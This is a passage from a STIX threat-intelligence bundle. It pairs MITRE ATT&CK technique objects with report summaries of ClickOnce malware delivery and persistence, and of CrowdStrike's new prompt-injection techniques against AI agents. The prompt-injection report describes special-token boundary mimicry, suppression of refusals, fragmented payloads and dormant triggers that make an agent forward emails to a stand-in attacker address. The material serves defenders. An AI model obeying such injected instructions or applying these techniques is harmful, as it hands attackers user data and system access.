      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3a449ba4-2bb3-5214-bb4b-1ba2838b660d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2799bbdc-7d81-5f95-a70b-bd525e753d8b",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--08735739-8cba-56c1-afb5-e8e5cee1c42b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2799bbdc-7d81-5f95-a70b-bd525e753d8b",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--be6da910-66f3-542d-9a77-e195e7f65ad4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2799bbdc-7d81-5f95-a70b-bd525e753d8b",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f1e49c07-eadf-5fc5-bc9c-bcdc93723e9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2799bbdc-7d81-5f95-a70b-bd525e753d8b",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2799bbdc-7d81-5f95-a70b-bd525e753d8b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Threat Actors Abuse Microsoft ClickOnce for Stealthy Malware Delivery and Persistence",
      "description": "## Overview\n\nThreat actors are increasingly weaponizing Microsoft's ClickOnce technology to facilitate the stealthy delivery and persistence of malware on target systems. This technique leverages ClickOnce's features, such as simplified user interaction for installation (requiring only one or two clicks), the ability to deploy applications without elevated administrative privileges, and its built-in update mechanism. Attackers exploit a general lack of awareness among users and security tools regarding `.application` files, allowing malicious payloads to bypass typical email filtering and security scrutiny. The legitimate nature of ClickOnce execution, often involving processes like `dfsvc.exe` and `rundll32.exe`, provides a powerful defense evasion mechanism. This approach enables adversaries to establish persistent remote access, update their malware, and conduct further malicious activities without raising immediate suspicion.\n\n## Attack Chain\n\n1.  **Initial Access / User Execution**: Threat actor convinces the target user to click a malicious link or button, often distributed via phishing, leading to the download of a `.application` file.\n2.  **Deployment**: The user interaction triggers the ClickOnce deployment mechanism, installing the application without requiring administrator privileges.\n3.  **Payload Execution (Initial)**: The initial malicious payload executes as part of the ClickOnce application deployment, often within legitimate Microsoft process trees like `dfsvc.exe` or `rundll32.exe`.\n4.  **Persistence Establishment**: A shortcut file (`.appref-ms`) is dropped into the user's Start Menu (`%Users\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\`) by the ClickOnce mechanism, configured to automatically check for updates.\n5.  **Malicious Update**: The threat actor, controlling the deployment server, pushes a malicious update for the ClickOnce application.\n6.  **Update Execution / Code Download**: The next time the user launches the application via the `.appref-ms` shortcut, the ClickOnce components fetch the malicious update from the server.\n7.  **Payload Execution (Updated)**: The newly downloaded malicious components are executed without further user prompts, enabling remote access, C2 communication, lateral movement, or other attacker objectives.\n8.  **Impact**: The attacker maintains persistent access, updates their tooling, exfiltrates data, or deploys additional malware (e.g., ransomware) leveraging the established foothold.\n\n## Impact\n\nThe abuse of ClickOnce technology allows threat actors to establish a stealthy and persistent presence within victim environments. By executing within legitimate Microsoft processes, the malicious activity can evade traditional security controls that might scrutinize known malware executables. Organizations across various sectors are vulnerable, as this technique exploits a fundamental, legitimate Windows feature. Successful attacks can lead to sustained remote access, data exfiltration, deployment of ransomware, and lateral movement across the network, ultimately compromising the integrity and confidentiality of critical systems and data. The widespread nature of Windows environments makes this a significant threat vector.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment, specifically prioritizing `process_creation` events involving `dfsvc.exe` and `rundll32.exe`.\n*   Enable Sysmon `process_creation` and `file_event` logging to activate the rules above and gain visibility into ClickOnce application behavior.\n*   Implement application control policies to restrict the execution of unsigned or untrusted ClickOnce applications, particularly those originating from untrusted internet sources.\n*   Monitor network connections originating from `dfsvc.exe` or `rundll32.exe` to unexpected external IP addresses or non-standard ports.\n*   Educate users about the risks of clicking on untrusted links or downloading software from unverified sources, even if it appears to be a legitimate application installer.\n",
      "published": "2026-06-21T07:02:58Z",
      "labels": [
        "clickonce",
        "persistence",
        "delivery",
        "windows",
        "defense-evasion"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-two/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ad4a6356-c627-5016-adcb-409a4e5adb82",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1d240020-8ca9-52f4-87b1-1b7121f2893b",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Abuse Elevation Control Mechanism",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1548",
          "url": "https://attack.mitre.org/techniques/T1548"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--18ca8024-0b1b-50b9-ab76-22aeb2f0a5dd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1d240020-8ca9-52f4-87b1-1b7121f2893b",
      "target_ref": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--1d240020-8ca9-52f4-87b1-1b7121f2893b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of ClickOnce Technology: Understanding Internals",
      "description": "## Overview\n\nCrowdStrike has published the first part of a series detailing the underlying mechanics of Microsoft's ClickOnce deployment technology. ClickOnce is designed to simplify application distribution and updates, allowing users to install and run software with minimal interaction and without requiring administrative privileges. While beneficial for legitimate developers, these very features present a substantial opportunity for threat actors to easily spread malware, bypass security controls, and establish persistence. This initial blog post, published on June 18, 2026, focuses on explaining how ClickOnce functions, from the publishing process to application deployment and installation on user endpoints. It sets the foundation for understanding how this technology can be weaponized, promising further discussion on specific abuse methods and detection strategies in an upcoming Part 2. Defenders should understand these internals to anticipate and counter future threats leveraging this often-overlooked technology.\n\n## Impact\n\nWhile this brief does not detail observed attacks, the inherent properties of ClickOnce technology allow for significant potential impact. If weaponized, ClickOnce can facilitate widespread malware distribution, enabling threat actors to deliver payloads that bypass traditional installation methods requiring elevated privileges. This could lead to unauthorized system access, data exfiltration, ransomware deployment, or other malicious activities, often initiated through a single user click. The self-updating feature could also allow persistent access and dynamic payload changes, making detection and eradication challenging. Organizations relying on ClickOnce for legitimate deployments are particularly susceptible to impersonation or supply chain attacks leveraging its trusted delivery mechanisms.\n\n## Recommendation\n\n*   Familiarize your security teams with the internal workings of ClickOnce technology as described in this brief.\n*   Monitor for the creation and execution of ClickOnce applications (.application files) outside of expected enterprise software deployment mechanisms.\n*   Review existing endpoint security policies to ensure they adequately cover ClickOnce application execution and update processes.\n*   Prepare for specific detection strategies and actionable intelligence that will be detailed in Part 2 of this blog series, which is expected to cover threat actor exploitation methods.\n",
      "published": "2026-07-08T06:48:38Z",
      "labels": [
        "clickonce",
        "windows",
        "deployment-technology",
        "abuse-of-feature",
        "defense-evasion",
        "execution"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e45ab8fc-efb0-5498-ad7e-0b8b432b8de2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Drive-by Compromise",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1189",
          "url": "https://attack.mitre.org/techniques/T1189"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4c54bbf7-df02-5441-8f3b-c16e5ba6556b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b21c1f30-b80b-5a18-8b5d-c54a5edf468e",
      "target_ref": "attack-pattern--e45ab8fc-efb0-5498-ad7e-0b8b432b8de2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f6ac9138-cc3d-5051-9c80-f3cced34fa33",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b21c1f30-b80b-5a18-8b5d-c54a5edf468e",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Signed Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9223d08d-8103-57b8-9f9e-3173e8b0f7fb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b21c1f30-b80b-5a18-8b5d-c54a5edf468e",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b1be7195-4b29-5b09-b485-068feb284e4c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b21c1f30-b80b-5a18-8b5d-c54a5edf468e",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Scheduled Task/Job",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1b49b92f-468a-5e2c-911b-7cd0672dd590",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b21c1f30-b80b-5a18-8b5d-c54a5edf468e",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8de39f39-bd74-546d-951e-ddf3f8b1d73f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b21c1f30-b80b-5a18-8b5d-c54a5edf468e",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--28d9503b-c43f-5ad5-a8bc-d13207e4e82c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b21c1f30-b80b-5a18-8b5d-c54a5edf468e",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b21c1f30-b80b-5a18-8b5d-c54a5edf468e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of the ClickOnce Technology, Part 2: Stop Threat Actors from Clicking Once and Staying Forever",
      "description": "## Overview\n\nCrowdStrike has identified new methods of abusing Microsoft's ClickOnce deployment technology, which threat actors are actively leveraging to deliver malware, achieve persistence, and maintain remote access. This abuse exploits ClickOnce's minimal user interaction, ability to deploy without administrative privileges, and built-in updating mechanism. Actors are observed weaponizing `.application` files and manipulating `.appref-ms` shortcuts to stealthily execute payloads within legitimate Microsoft processes such as `rundll32.exe` and `dfsvc.exe`. The simplified delivery phase bypasses traditional defenses like email filters, and the lack of user awareness regarding ClickOnce installations contributes to the success of these attacks. This ongoing threat highlights a significant vector for initial access and long-term compromise against Windows endpoints.\n\n## Attack Chain\n\n1. **Initial Access:** Threat actor persuades a user to click a malicious link or button on a webpage, or directly delivers a weaponized `.application` file via a non-email vector.\n2. **Execution (ClickOnce Deployment):** The malicious ClickOnce application is downloaded and executed, initiating the deployment process on the victim's machine.\n3. **Execution (Payload Launch):** The malicious payload embedded within the ClickOnce application is launched, often executing discreetly within the context of legitimate Microsoft processes such as `rundll32.exe` or `dfsvc.exe`.\n4. **Persistence (Shortcut Creation):** An `.appref-ms` file, configured to launch the malicious ClickOnce application, is created and placed in the user's Start Menu or other auto-run locations (e.g., Startup folder).\n5. **Persistence (Update Mechanism Abuse):** The threat actor updates the malicious ClickOnce application on their controlled deployment server with new or modified malicious components, including altered command and control (C2) addresses.\n6. **Persistence (Re-execution):** When the user subsequently launches the ClickOnce application from the Start Menu shortcut, the built-in update mechanism automatically downloads and executes the updated malicious payload without further user authorization.\n7. **Command and Control:** The executed payload establishes command and control (C2) communications with the attacker's infrastructure, enabling remote access, further lateral movement, or data exfiltration.\n\n## Impact\n\nThe successful exploitation of ClickOnce technology allows threat actors to bypass common security controls and establish persistent access to compromised systems without requiring administrative privileges. This can lead to the installation of various malware, including remote access tools, information stealers, or ransomware. Organizations face risks of data exfiltration, system takeover, and significant financial or reputational damage, as adversaries can continuously update their malicious applications and maintain a covert presence.\n\n## Recommendation\n\n* Enable Sysmon `FileCreate` and `ProcessCreate` event logging on Windows endpoints to capture activity related to ClickOnce deployment and execution.\n* Deploy the Sigma rule \"Detect ClickOnce .appref-ms Persistence\" to identify suspicious creation or modification of `.appref-ms` files in auto-run directories.\n* Deploy the Sigma rule \"Detect Suspicious Outbound Network Connection from ClickOnce Service\" to flag unusual network activity originating from the `dfsvc.exe` process.\n* Educate users on the risks associated with clicking suspicious links and executing `.application` files from untrusted sources, emphasizing that these can trigger software installation.\n",
      "published": "2026-07-08T08:07:01Z",
      "labels": [
        "clickonce",
        "microsoft",
        "persistence",
        "delivery",
        "windows",
        "endpoint"
      ],
      "object_refs": [
        "attack-pattern--e45ab8fc-efb0-5498-ad7e-0b8b432b8de2",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-two/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d216c505-89cd-5135-9d62-889e27484a24",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "email: anon@evilcorp.corp",
      "pattern": "[email-addr:value = 'anon@evilcorp.corp']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T05:59:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f01b8113-9888-5098-8025-3dbce2ae2d17",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f393fd3f-596c-56c5-9a29-b1e413c1ef06",
      "target_ref": "indicator--d216c505-89cd-5135-9d62-889e27484a24"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d640d429-2909-5a3c-9921-fa70880b0259",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f393fd3f-596c-56c5-9a29-b1e413c1ef06",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dd3ad6f6-0bb6-5fd4-854d-fcec74e180e6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f393fd3f-596c-56c5-9a29-b1e413c1ef06",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ab6c3a1-4583-5f4d-b87c-48cb453d62f5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Automated Collection",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1119",
          "url": "https://attack.mitre.org/techniques/T1119"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e85fb335-48e3-5d34-ae56-604e0cd26124",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f393fd3f-596c-56c5-9a29-b1e413c1ef06",
      "target_ref": "attack-pattern--5ab6c3a1-4583-5f4d-b87c-48cb453d62f5"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f393fd3f-596c-56c5-9a29-b1e413c1ef06",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CrowdStrike Uncovers New Prompt Injection Techniques in AI Systems",
      "description": "## Overview\n\nCrowdStrike's AI security research team has unveiled 18 new prompt injection techniques, expanding their taxonomy to over 200 methods as of July 2026. These advanced techniques reflect the evolving landscape of AI system manipulation, moving beyond simple jailbreaks to target powerful AI agents capable of web crawling, file access, and command execution. Adversaries are embedding these attacks within data consumed by AI agents or employing social engineering to trick users into delivering malicious prompts. This development is critical for defenders because successful prompt injection can hijack AI capabilities, bypass security controls, modify AI behavior, and enable unauthorized actions such as SQL injection, data exfiltration, or the execution of arbitrary shell commands within authenticated user sessions or agent environments. The scope of targeting includes popular models like Gemini and Anthropic Claude, as well as Kubernetes AI applications, highlighting a pervasive threat to AI deployments.\n\n## Attack Chain\n\n1.  **Initial Access / Delivery**: An adversary crafts a malicious prompt containing various injection techniques and uses social engineering (IM0005 - Unwitting User Delivery) to trick a legitimate, authenticated user into unknowingly inputting the crafted prompt into an AI agent, often through deceptive social media posts or manipulated content.\n2.  **Payload Fragmentation / Obfuscation**: The user's input, containing the malicious prompt, includes fragmented instructions (PT0200 - Algorithmic Payload Decomposition) or special tokens (PT0198 - Special Token Injection) designed to appear benign during initial scanning but are reassembled or misinterpreted by the AI model's internal processing.\n3.  **Defense Evasion - Cognitive Manipulation**: The prompt incorporates techniques like Cognitive Token Suppression (PT0197) to prevent the AI from generating standard safety responses, apologies, or refusal language, thereby reducing the likelihood of detection and enabling risky outputs.\n4.  **Privilege Escalation - Boundary Confusion**: Special Token Injection (PT0198) mimics the AI system's internal formatting boundaries or role identifiers, tricking the application or model into elevating untrusted user content to a higher-priority system directive.\n5.  **Persistence / Dormant Command**: The attacker embeds dormant instructions (PT0201 - Trigger-Activated Rule Addition) within the prompt, which remain inactive until a specific trigger phrase, event, or condition is met later in the AI agent's operation (e.g., a specific type of email being sent).\n6.  **Execution - Unauthorized SQL Query**: Leveraging the elevated privileges or confused boundaries from PT0198, the AI agent is coerced into executing an unauthorized SQL query, such as `INSERT INTO employees (id, name, department, salary) VALUES (666, 'Sentry', 'Rocks', 66666);`, demonstrating data manipulation or exfiltration capabilities.\n7.  **Execution - Shell Commands**: The manipulated AI agent, which possesses the capability to \"write shell commands,\" is directed to execute arbitrary operating system commands, potentially leading to system compromise or further network traversal.\n8.  **Impact - Data Exfiltration**: Upon activation of the pre-set trigger, the dormant instruction from PT0201 causes the AI agent to perform unauthorized actions like duplicating and forwarding sensitive emails to an attacker-controlled address (e.g., `anon@evilcorp.corp`), leading to data exfiltration.\n\n## Impact\n\nSuccessful prompt injection attacks can severely compromise the integrity and confidentiality of AI systems and the data they access. Adversaries can hijack AI agents to perform unauthorized actions, including the execution of arbitrary shell commands, direct database manipulation (like SQL injection), and exfiltration of sensitive information such as corporate emails. The ability to plant dormant instructions allows for delayed and stealthy attacks, bypassing immediate security reviews. The cognitive manipulation techniques can disable AI safety features, leading to the generation of harmful content or actions. Victims could face significant data breaches, system compromise, reputational damage, and financial losses due to manipulated AI operations, affecting potentially any organization deploying advanced AI agents.\n\n## Recommendation\n\n*   Implement robust input validation and sanitization for all AI agent prompts, RAG pipelines, API inputs, and data sources, focusing on patterns indicative of shell metacharacters, SQL keywords, or special token mimicking.\n*   Educate users about the risks of prompt injection and social engineering tactics (IM0005) that trick them into inadvertently delivering malicious prompts to AI systems.\n*   Review and enforce strong access controls and least privilege principles for AI agents, limiting their ability to execute sensitive commands or access critical data even if manipulated.\n*   Conduct regular AI red teaming exercises, explicitly including techniques such as boundary mimicry (PT0198), indirect injection (PT0200), and delayed activation (PT0201) to identify vulnerabilities.\n*   Monitor AI agent logs and outputs for unusual activity, unexpected responses, or deviations from expected behavior that could indicate successful prompt injection.\n*   Develop and deploy detection logic capable of identifying the specific prompt patterns exemplified in this brief (e.g., PT0201, PT0197, PT0200, PT0198, IM0005) within AI input streams and processing logs.\n",
      "published": "2026-07-08T05:59:19Z",
      "labels": [
        "ai-security",
        "prompt-injection",
        "machine-learning",
        "cloud-security",
        "defense-evasion",
        "social-engineering"
      ],
      "object_refs": [
        "indicator--d216c505-89cd-5135-9d62-889e27484a24",
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5ab6c3a1-4583-5f4d-b87c-48cb453d62f5"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/crowdstrike-uncovers-new-prompt-injection-techniques/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Brute Force",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1110",
          "url": "https://attack.mitre.org/techniques/T1110"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--baaa357b-947f-5765-8859-1ed80fc3e386",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--417613e2-3282-5b2f-84cf-d383c3ffb876",
      "target_ref": "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--01784e77-1bdd-5906-b861-055b3f9748fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--417613e2-3282-5b2f-84cf-d383c3ffb876",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--417613e2-3282-5b2f-84cf-d383c3ffb876",
